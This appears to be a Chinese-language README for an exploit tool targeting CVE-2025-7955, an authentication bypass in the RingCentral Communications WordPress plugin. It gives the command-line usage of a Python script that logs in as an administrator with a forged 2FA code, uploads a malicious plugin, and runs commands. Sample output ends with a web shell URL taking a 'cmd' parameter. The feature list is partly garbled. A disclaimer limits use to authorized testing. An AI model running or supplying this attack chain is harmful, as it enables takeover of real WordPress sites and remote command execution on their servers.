RingCentral Communications 1.5 - 1.6.8 - 缺少服务器端验证导致通过 ringcentral_admin_login_2fa_verify 函数绕过认证
CVE: CVE-2025-7955
受影响插件: RingCentral Communications (WordPress)
受影响版本: 1.5 – 1.6.8
CVSS 评分: 9.8 (严重)
类型: 认证绕过 (缺少服务器端验证)
RingCentral Communications WordPress 插件由于
ringcentral_admin_login_2fa_verify()函数中的不当验证而存在认证绕过漏洞。版本 1.5 至 1.6.8 允许未经身份验证的攻击者仅通过提供相同的伪造代码即可登录为任何用户。
此漏洞利用工具自动化 CVE-2025-7955 的整个攻击链。它旨在实现以下功能:
/wp-json/wp/v2/users/ID) 枚举用户名。whoami 展示命令执行能力,并打印输出。准备你的恶意插件
确保你的恶意插件 ZIP 文件(默认:Nxploit.zip)与脚本位于同一目录。
运行漏洞利用工具:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (必需) 目标 WordPress 站点 URL-user, --username : (可选) 登录用户名(省略时自动发现)-id, --id_admin : (默认: 1) 用户 ID(管理员通常为 ID 1)-z, --zip : (默认: Nxploit.zip) 恶意插件 ZIP 文件路径示例:
python3 CVE-2025-7955.py -u http://target/wordpress
或指定用户名/ID:
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] 正在使用 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] 正在尝试以 admin (ID: 1) 身份登录
[+] 登录成功!
[+] Nonce: 661e57f2e4
[*] 正在上传恶意插件...
[+] 插件上传成功!
[*] 正在执行: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
此工具 仅供授权的安全测试和教育用途使用。
在未经你拥有或明确许可测试的系统中使用是 非法的和不道德的。
作者对该脚本的任何滥用或造成的损失 不承担任何责任。
作者: Khaled Alenazi (Nxploited)
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1